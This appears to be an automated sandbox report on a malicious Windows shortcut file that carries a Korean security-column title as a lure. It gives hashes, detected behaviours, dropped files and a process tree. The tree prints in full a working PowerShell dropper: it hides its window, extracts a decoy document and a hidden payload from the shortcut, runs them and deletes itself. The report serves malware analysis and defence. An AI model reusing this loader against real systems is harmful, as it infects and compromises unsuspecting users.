dbd5d662cc53d4b91cf7da9979cdffd1b4f702323bb9ec4114371bc6f4f0d4a6

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240221-en
resource tags

arch:x64arch:x86image:win10v2004-20240221-enlocale:en-usos:windows10-2004-x64system
submitted
22-02-2024 04:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

(안보칼럼) 반국가세력에 안보기관이 무기력해서는 안된다.lnk
Size

221.4MB
MD5

5f6682ad9da4590cba106e2f1a8cbe26
SHA1

7043c7c101532df47c832ce5270745dd3d1e8c08
SHA256

dbd5d662cc53d4b91cf7da9979cdffd1b4f702323bb9ec4114371bc6f4f0d4a6
SHA512

e744d1b0cf232c4cf224cd1413b13e41889692e2d1f29e948fe8d4a5cb1304bca9a7b5de9c34db98c8eb7440761d5233bc5ac6a4fe75de2d4009a06f318c1d35
SSDEEP

24576:P0sde6UvoEkUnigRXTTYdy830QtO0oIJjW7sFAc1Mh5l2yf:Mz6UvRXigjbaJa7f2yf

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

cmd.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-3316742141-2240921845-2885234760-1000\Control Panel\International\Geo\Nation cmd.exe
Deletes itself 1 IoCs

Processes:

powershell.exe

pid process

4520 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

3408 4664 WerFault.exe powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3316742141-2240921845-2885234760-1000\Control Panel\International\Geo\Nation	cmd.exe

pid	process
4520	powershell.exe

pid	pid_target	process	target process
3408	4664	WerFault.exe	powershell.exe

Modifies registry class 2 IoCs

Processes:

powershell.exeOpenWith.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3316742141-2240921845-2885234760-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-3316742141-2240921845-2885234760-1000_Classes\Local Settings	OpenWith.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

4520 powershell.exe
4520 powershell.exe
4664 powershell.exe
4664 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 4520 powershell.exe
Token: SeDebugPrivilege 4664 powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

OpenWith.exe

pid process

3428 OpenWith.exe

pid	process
4520	powershell.exe
4520	powershell.exe
4664	powershell.exe
4664	powershell.exe

description	pid	process
Token: SeDebugPrivilege	4520	powershell.exe
Token: SeDebugPrivilege	4664	powershell.exe

pid	process
3428	OpenWith.exe

Suspicious use of WriteProcessMemory 45 IoCs

Processes:

cmd.execmd.exepowershell.execsc.execmd.exepowershell.execsc.execsc.execsc.execsc.exe

description	pid	process	target process
PID 4172 wrote to memory of 1412	4172	cmd.exe	cmd.exe
PID 4172 wrote to memory of 1412	4172	cmd.exe	cmd.exe
PID 4172 wrote to memory of 1412	4172	cmd.exe	cmd.exe
PID 1412 wrote to memory of 3908	1412	cmd.exe	cmd.exe
PID 1412 wrote to memory of 3908	1412	cmd.exe	cmd.exe
PID 1412 wrote to memory of 3908	1412	cmd.exe	cmd.exe
PID 1412 wrote to memory of 4520	1412	cmd.exe	powershell.exe
PID 1412 wrote to memory of 4520	1412	cmd.exe	powershell.exe
PID 1412 wrote to memory of 4520	1412	cmd.exe	powershell.exe
PID 4520 wrote to memory of 4452	4520	powershell.exe	csc.exe
PID 4520 wrote to memory of 4452	4520	powershell.exe	csc.exe
PID 4520 wrote to memory of 4452	4520	powershell.exe	csc.exe
PID 4452 wrote to memory of 4684	4452	csc.exe	cvtres.exe
PID 4452 wrote to memory of 4684	4452	csc.exe	cvtres.exe
PID 4452 wrote to memory of 4684	4452	csc.exe	cvtres.exe
PID 4520 wrote to memory of 1644	4520	powershell.exe	cmd.exe
PID 4520 wrote to memory of 1644	4520	powershell.exe	cmd.exe
PID 4520 wrote to memory of 1644	4520	powershell.exe	cmd.exe
PID 1644 wrote to memory of 4664	1644	cmd.exe	powershell.exe
PID 1644 wrote to memory of 4664	1644	cmd.exe	powershell.exe
PID 1644 wrote to memory of 4664	1644	cmd.exe	powershell.exe
PID 4664 wrote to memory of 2444	4664	powershell.exe	csc.exe
PID 4664 wrote to memory of 2444	4664	powershell.exe	csc.exe
PID 4664 wrote to memory of 2444	4664	powershell.exe	csc.exe
PID 2444 wrote to memory of 4524	2444	csc.exe	cvtres.exe
PID 2444 wrote to memory of 4524	2444	csc.exe	cvtres.exe
PID 2444 wrote to memory of 4524	2444	csc.exe	cvtres.exe
PID 4664 wrote to memory of 3984	4664	powershell.exe	csc.exe
PID 4664 wrote to memory of 3984	4664	powershell.exe	csc.exe
PID 4664 wrote to memory of 3984	4664	powershell.exe	csc.exe
PID 3984 wrote to memory of 3540	3984	csc.exe	cvtres.exe
PID 3984 wrote to memory of 3540	3984	csc.exe	cvtres.exe
PID 3984 wrote to memory of 3540	3984	csc.exe	cvtres.exe
PID 4664 wrote to memory of 1932	4664	powershell.exe	csc.exe
PID 4664 wrote to memory of 1932	4664	powershell.exe	csc.exe
PID 4664 wrote to memory of 1932	4664	powershell.exe	csc.exe
PID 1932 wrote to memory of 3144	1932	csc.exe	cvtres.exe
PID 1932 wrote to memory of 3144	1932	csc.exe	cvtres.exe
PID 1932 wrote to memory of 3144	1932	csc.exe	cvtres.exe
PID 4664 wrote to memory of 1168	4664	powershell.exe	csc.exe
PID 4664 wrote to memory of 1168	4664	powershell.exe	csc.exe
PID 4664 wrote to memory of 1168	4664	powershell.exe	csc.exe
PID 1168 wrote to memory of 4560	1168	csc.exe	cvtres.exe
PID 1168 wrote to memory of 4560	1168	csc.exe	cvtres.exe
PID 1168 wrote to memory of 4560	1168	csc.exe	cvtres.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\(안보칼럼) 반국가세력에 안보기관이 무기력해서는 안된다.lnk"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4172

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /k for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a "$t1 = 'user32.dll';$t = 'using System; using System.Runtime.InteropServices; public class User32 {[DllImport(' + [System.Text.Encoding]::UTF8.GetString(34) + $t1 + [System.Text.Encoding]::UTF8.GetString(34) + ', SetLastError = true)]public static extern IntPtr FindWindow(string lpClassName, string lpWindowName);[DllImport(' + [System.Text.Encoding]::UTF8.GetString(34) + $t1 + [System.Text.Encoding]::UTF8.GetString(34) + ')] [return: MarshalAs(UnmanagedType.Bool)] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); }'; Add-Type -TypeDefinition $t;$proName = 'powershell.exe'; $cmdMainWindowHandle = [User32]::FindWindow([NullString]::Value, $proName);[User32]::ShowWindow($cmdMainWindowHandle, 0);$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0DD6DA21} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x0000162E, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x00042C00;$lnkFile.Read($pdfFile, 0, 0x00042C00);$pdfPath = $lnkPath.replace('.lnk','.hwp');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x0004422E,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'public.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x0011D630,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005AA;$lnkFile.Read($stringByte, 0, 0x000005AA);$batStrPath = $env:temp+'\'+'temp.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0011DBDA,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'+'working.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"&& exit
2⤵
- Suspicious use of WriteProcessMemory
PID:1412

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od
3⤵
PID:3908

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe "$t1 = 'user32.dll';$t = 'using System; using System.Runtime.InteropServices; public class User32 {[DllImport(' + [System.Text.Encoding]::UTF8.GetString(34) + $t1 + [System.Text.Encoding]::UTF8.GetString(34) + ', SetLastError = true)]public static extern IntPtr FindWindow(string lpClassName, string lpWindowName);[DllImport(' + [System.Text.Encoding]::UTF8.GetString(34) + $t1 + [System.Text.Encoding]::UTF8.GetString(34) + ')] [return: MarshalAs(UnmanagedType.Bool)] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); }'; Add-Type -TypeDefinition $t;$proName = 'powershell.exe'; $cmdMainWindowHandle = [User32]::FindWindow([NullString]::Value, $proName);[User32]::ShowWindow($cmdMainWindowHandle, 0);$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0DD6DA21} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x0000162E, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x00042C00;$lnkFile.Read($pdfFile, 0, 0x00042C00);$pdfPath = $lnkPath.replace('.lnk','.hwp');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x0004422E,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'public.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x0011D630,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005AA;$lnkFile.Read($stringByte, 0, 0x000005AA);$batStrPath = $env:temp+'\'+'temp.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0011DBDA,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'+'working.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"
3⤵
- Deletes itself
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4520

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fwjfd0hc\fwjfd0hc.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:4452

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5582.tmp" "c:\Users\Admin\AppData\Local\Temp\fwjfd0hc\CSCA4C33E73E1D4BB381E3EFC12AC93FAF.TMP"
5⤵
PID:4684

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\working.bat""
4⤵
- Suspicious use of WriteProcessMemory
PID:1644

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden "$stringPath=$env:temp+'\'+'temp.dat';$stringByte = Get-Content -path $stringPath -encoding byte;$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$scriptBlock = [scriptblock]::Create($string);&$scriptBlock;"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4664

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\33zdar0n\33zdar0n.cmdline"
6⤵
- Suspicious use of WriteProcessMemory
PID:2444

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7E19.tmp" "c:\Users\Admin\AppData\Local\Temp\33zdar0n\CSCEDEE6D93BAC64ABC9F85B31E66D86E1E.TMP"
7⤵
PID:4524

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ydu1qreh\ydu1qreh.cmdline"
6⤵
- Suspicious use of WriteProcessMemory
PID:3984

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7FAF.tmp" "c:\Users\Admin\AppData\Local\Temp\ydu1qreh\CSC676ED4BBA46E47889F8763B5BF1127CE.TMP"
7⤵
PID:3540

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iuoat1cm\iuoat1cm.cmdline"
6⤵
- Suspicious use of WriteProcessMemory
PID:1932

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES804C.tmp" "c:\Users\Admin\AppData\Local\Temp\iuoat1cm\CSCCEF2628768754FF49FF142EC286A8770.TMP"
7⤵
PID:3144

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ps43rcqp\ps43rcqp.cmdline"
6⤵
- Suspicious use of WriteProcessMemory
PID:1168

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8117.tmp" "c:\Users\Admin\AppData\Local\Temp\ps43rcqp\CSCA629244B194A452A873F9228DF21B3F5.TMP"
7⤵
PID:4560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4664 -s 2556
6⤵
- Program crash
PID:3408

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3428

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4664 -ip 4664
1⤵
PID:2328

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
09e77892337cb6578a91a257d0ecf409

SHA1
f73fd6b259cffb5b11c21f199e85603cff6a61df

SHA256
8a6c48103f58d3d06f58227c172a112bec7e9ede4fd9b885caf0b2c4a796e4fc

SHA512
95db19929ac637c96e407c4a1380846fabd0330412d6ccd2fe2ca053705298a60c7634d61b107d26c96977a8781071ca7b048079f3ff9b286cd2cc2d4b59ee46

Download Submit
C:\Users\Admin\AppData\Local\Temp\33zdar0n\33zdar0n.dll

Filesize
3KB

MD5
ee5e6d5c8a10fa99cda343e7209e586b

SHA1
77d025244e676afda9feda90f82b998c23ec64de

SHA256
bb831c9fac28ec388b14cf1d1a06a56dbb4bfdd0b733c83ab2200216c6aa05e2

SHA512
bff18aa83f5d053860219265ac062145b51886561fbefc23ae53572f70103700e026b8f2e4ff635a6639ed0eb1fc3ec964ab69b5daa25fbbb39e771a7705296b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES5582.tmp

Filesize
1KB

MD5
5d2cda1c26d60fe9dd6c2d2ae2d178e7

SHA1
d72e00dbd8963e0aef61b942224d55fc5ecad41e

SHA256
e5d2f0c85dae381b50bd8ca6d3436c9728a5cccf21e89ee1e60020a8b761b98a

SHA512
9702d9da106b689939708197bdea8e0ba306c78b7f580d84d324e4717d488557ebf9ef49f4da7545012aa1a80aef8f0f7f760b6c596ea14479510f2178dd8abd

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES7E19.tmp

Filesize
1KB

MD5
1ac6a420a08fa7a13ebd9f6cbc903954

SHA1
be5bfbc0c86ac8b586e3dca2da98b559c662fbc2

SHA256
2682e0237737fdba4b89257e933f3e4c22c92ca106d9ce8a2555b4fee4cfa868

SHA512
bd85424f0f9c0ae46b334ff3e64a0a479184dc9d0e0c9c34cba6e32eb855b20d26e6e7c42add824e48ab84414f7fc1b479668622febe991badfd907f52374b46

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES7FAF.tmp

Filesize
1KB

MD5
0cc1fc0026e0a3fef72fd61a59cc0d34

SHA1
2518c75d2882e0a8748f01ff0f4f1598fadf0f80

SHA256
cb9668921390e0956946a85c8d6973e1b55cb1560d0485f79bad4ec5a3b8a359

SHA512
abb7d62c1ee549c94a62df89c77fedf0b623e766c6f20c429148490fb06b013e5929a60af0e716ef455c647b9501377d1fa846f5043508c028f3580783166d1b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES804C.tmp

Filesize
1KB

MD5
a2129b7dbedc1f197ac8101f003c6094

SHA1
f10ded211aaf34a81374fb8b8cec6928ac9bcc1f

SHA256
5041a2fe0b311427a669d358a569674578ba42b3415e17726fc8726198a17fad

SHA512
ea6d775d09ed3d161fc76b2dbe330898d6fdb8d6892c6b7266be242b442399415208fc4be88ad6db2cb276c107bd5b800bbdca4e6f3c1980f67ccc52939a5fbb

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES8117.tmp

Filesize
1KB

MD5
eac5047812dd5b3570b9784de7115875

SHA1
ce47a72e3a3a3ef7ae07c0ab89e2ed8a83899ee2

SHA256
4dc7cfa53801d78153241e80aa098685a9fe972fbb2f41f77f8a7d78790ea4dd

SHA512
4707f20af594d5038a6da45a7c8ea3b540e30b40161700196ff22bc8c8bba3d8b7cffba73885f521bbd70eb6cb5d95c2abd97111dcd25c83d969f241a77d679c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bgddl4vo.34f.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\fwjfd0hc\fwjfd0hc.dll

Filesize
3KB

MD5
cfa6d6698e41c20ef1139161f90d3df9

SHA1
0748e4cb8b074c67a759e6515ea1a8b06ff1494d

SHA256
ab5164eda6d2dc1b22da0a6a4634ba0ffea22eed11c5d5924e70195a4e9500a6

SHA512
c7c620b482610acd99448e6db99e778f122efb6bed74c36138853d84f3ec6224b5bad5ebc8b478ad32f2cffd1424edc1ceec5a735c80b3e21e09c5c8f030c464

Download Submit
C:\Users\Admin\AppData\Local\Temp\iuoat1cm\iuoat1cm.dll

Filesize
3KB

MD5
e27b51b417a9481c47c5e975b235aa8c

SHA1
fcce8069e09b8a700a4ae0b51471faef524fb6a1

SHA256
32817be71a2f33b7deb321da421f1741dde55dca7d8d031e2d4ac6b3cbb34edb

SHA512
9ce6b7ebc19cc0d5b72eae651b244c39178d2aba17febe48ee5d0d848df6debe99c87aa8ec1b576e2b0cd19a23c3dc1da320c72d42cd79d4beece3c1013533c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\ps43rcqp\ps43rcqp.dll

Filesize
3KB

MD5
9ab281b8b114bf1b7b07d13fc1481e70

SHA1
cd61bfd20afd87cba05453760a176b5c296593dd

SHA256
821a14185ec3b268df1da540f1b41e0e98d9e5744fc5c1c65bafcb202562eafe

SHA512
b9a318c44c561d51dd51b6203dcbf3bd40205dc176627de85bd2659d649ee64cd77ed621e04b3eb974a1889580a97dd82893b29b0415c4e12ab9522eaa14a953

Download Submit
C:\Users\Admin\AppData\Local\Temp\temp.dat

Filesize
1KB

MD5
78480139d86520ba82766c5b3c9a7479

SHA1
436e5aa0ef8c97a0b78a4289d19860c1ab8c1f1a

SHA256
85438bc7af4c48130c1fd51f8a02eb13b8d57b983411b15fa7f03a302e8e6d8c

SHA512
bc5ce718cf3330ab56a131e874785bd86eef4aa19281d3225401f9e33b798dac6cb6e3e58ba2780d9f3a223a7e16e50f1f64a01d03e1b6e78ea56778cfd449d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\working.bat

Filesize
311B

MD5
a1640eb8f424ebe13b94955f8d0f6843

SHA1
8551e56c3e19861dbcae87f83b6d0ab225c3793d

SHA256
6c0b21b211ba77b42631e1a2a010f858b8664a8bd0149573596a8cdd72e7c399

SHA512
6b40b95ac1979a81ed44f991375dc94fda64b872c79c18111d72210a24867811d925acae4b87d378bd9f1adc86cb9adcf359ff873be7e4579869bd7418d466c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\ydu1qreh\ydu1qreh.dll

Filesize
3KB

MD5
e5a1237bc8705ed34946cd4e4de3af03

SHA1
ce015202d69f2742c64e0e9b575a897b0185cf91

SHA256
75a93c7cd31af06dc542c279e1c072ba9b346b0cd0eea3cb475d3de71598f78c

SHA512
8b0d06601e7a35ac026857ec2f0d8befd3d6c3ff0908ba5b1ce92afbbc4306dc616d73fdf55f7d363872c6de2742085c858325de55180bcae0ceea60ded36299

Download Submit
C:\Users\Public\public.dat

Filesize
869KB

MD5
31aeb43b981d4d6272193e321bb21333

SHA1
84a21d2eb2847bcb53442e0aa7ab3f90dd796a61

SHA256
903b02ff3ef690ea53103737a07c36a732bd81ab04f78d6f5eb61ac0fc6f98a6

SHA512
7efb4cfd865a59b51b46e7071e3b346808a41621e893e6867658827c628d77866737697084c9b7c2cef110942aa2ad21e932642ef5feadb379cf8e7257b4cc88

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\33zdar0n\33zdar0n.0.cs

Filesize
249B

MD5
69ecfeb3e9a8fb7890d114ec056ffd6d

SHA1
cba5334d2ffe24c60ef793a3f6a7f08067a913db

SHA256
0a913fd594ad2da3159400fc3d7d2cc50b34f8f31675ec5ac5a41d7e79e9fd58

SHA512
be7eb5a6a8bcc7f279aee00ad650aa872fc7fc08227eedeb9cc0a4273f0382b91306f60878728eaba3c79fa8c96066b144ecea897360a11be38996f04fdd99e1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\33zdar0n\33zdar0n.cmdline

Filesize
369B

MD5
95ac7ef3c7f4f3281ccbe9bba04542ee

SHA1
ef8a04df46d666f643b250506917ff8b1b539779

SHA256
c7cf28e38987e7bc56854df6438a76c34e4afc5c681097adf2466e41624109b6

SHA512
f10ff52e0c1f4b8a11f73b9607fbfeb670490adf3dca31013247fa226c4b1eae2d20287140c2cbfce596680abca70d0b1f84d104070dabc18230a527d0464f9a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\33zdar0n\CSCEDEE6D93BAC64ABC9F85B31E66D86E1E.TMP

Filesize
652B

MD5
421490e5d38e3cb3c4741ab482a6b177

SHA1
2d212e56828348c0f0c285daed621abc2de1149f

SHA256
91b70b14b29fc5f1a4d3706b88e88e75c5a33a44c4a34abe467f5693c787f16b

SHA512
1690b48412b00eeec4f9fb392ac240220a0d2873e19f86def856687357666fbf4d3ebed209b7d64573ed5eb2b9832095faf4aff88865a29c182eae294927688c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fwjfd0hc\CSCA4C33E73E1D4BB381E3EFC12AC93FAF.TMP

Filesize
652B

MD5
7682afaf75127421c28f631634e0913b

SHA1
2ec9d9617566dd9b793033c2669a7ff87d100a05

SHA256
abee361307622c6eb6bcf113c5fdd05aafef7dbba485ca41835c15c68223aa61

SHA512
09b6b19412f359bcf3e6d0bf843e91b61e151603cb661bc23ee0b1abcc476df1aa0173ed49bbffc44318f4f346a5fa81e687867d0590a1d6c8b47aa23724b6d0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fwjfd0hc\fwjfd0hc.0.cs

Filesize
334B

MD5
60a1152ec32b816b91530c7814deaacd

SHA1
68f979631b0485aaae41203c4b14f9ce710dbd6f

SHA256
e4ec47a88eab9b07792d97b02ce1724cb45118860e8156bdeb9f7268b0c258d2

SHA512
58de87e6877b5495a250b8af6117a29fd32ae169086f37ad640a2b8eac6500b62daf0340410094765984381025bcdde750bd250088d3e4840f7aa72e9459eb65

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fwjfd0hc\fwjfd0hc.cmdline

Filesize
369B

MD5
5f8243a4fe075ccdb84a5e0459283813

SHA1
e2bf59afc637930290796052d9749a3fa1e283fb

SHA256
2e37884bb6eb12629c230c76c2ceeba057aa6128c9f9871c937266cb77152353

SHA512
1bea690fe5e03026aa7c329a56add500a2e3f1d86e8b304e3b889f5d6978d8189fdc85853ba1e75a370044262aa065cfd7c88f644406a7f161cbaa2e3da91b18

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\iuoat1cm\CSCCEF2628768754FF49FF142EC286A8770.TMP

Filesize
652B

MD5
d548bb69861c1b8e05b339a67bb6505f

SHA1
3837b45e5a664b89ae5b7f6cdd78946ce9aaa216

SHA256
7aa9a2e1106e577615bc4a00f5e7628407a7b3f56130048522f630dfa048b283

SHA512
c91e494ea2637af33262afc8324b558758f35ec05f5d0b8d7426aed48af3bca3b0e599ba3513b15830690e824a90b159f42c62fa5d2cfb805f39ca1ed047fec3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\iuoat1cm\iuoat1cm.0.cs

Filesize
286B

MD5
b23df8158ffd79f95b9bddd18738270b

SHA1
79e81bb74bc53671aeabecae224f0f9fe0e3ed7f

SHA256
856bded4416dd1595613354334ad1d3e5c4922a86102786429bcdb0e7f798882

SHA512
e23822d5b9a32d7fc705b772ef43bcb336e201ec9c1d2507a530e8b1b383b0727c0b53b92e881a953527e7b2ffb485e24c1161834c9380d1bb7498eac7e4a67f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\iuoat1cm\iuoat1cm.cmdline

Filesize
369B

MD5
fb2c62d14444fbe9ffa039727e71e0ca

SHA1
824c7e47bfb47231dbfe88779a934fab060b76a8

SHA256
add5bf666a3ce5be3cf1e053f798f07645765d60bfc0a3c84cf780c49037caad

SHA512
e2df60fc830dfe086e050c5f647755f8e066aaf195d6b338f9e6590b29cd7c37a2967d466d796629df47792bc8a19b3fd0b591bff06bf98bfffdaf5e1c73cb47

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ps43rcqp\CSCA629244B194A452A873F9228DF21B3F5.TMP

Filesize
652B

MD5
278de8047d926ec69c5ddd4cde82ba27

SHA1
88329a2837826d178621282a6d6928611b6911f0

SHA256
d982fe48da303225b5cbecf7a50822e5c2d1416ff03ce0659794b03393b3082b

SHA512
ac053ea39fc815cf8a564977b1db8a9280859879d1624d672b0f65c4abfe74f771012a69bb0171f8efd180b5f38dab4e75e569e76683bf58ec74a6bd3495f636

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ps43rcqp\ps43rcqp.0.cs

Filesize
259B

MD5
560e1b883a997afcfa3b73d8a5cddbc1

SHA1
2905f3f296ac3c7d6a020fb61f0819dbea2f1569

SHA256
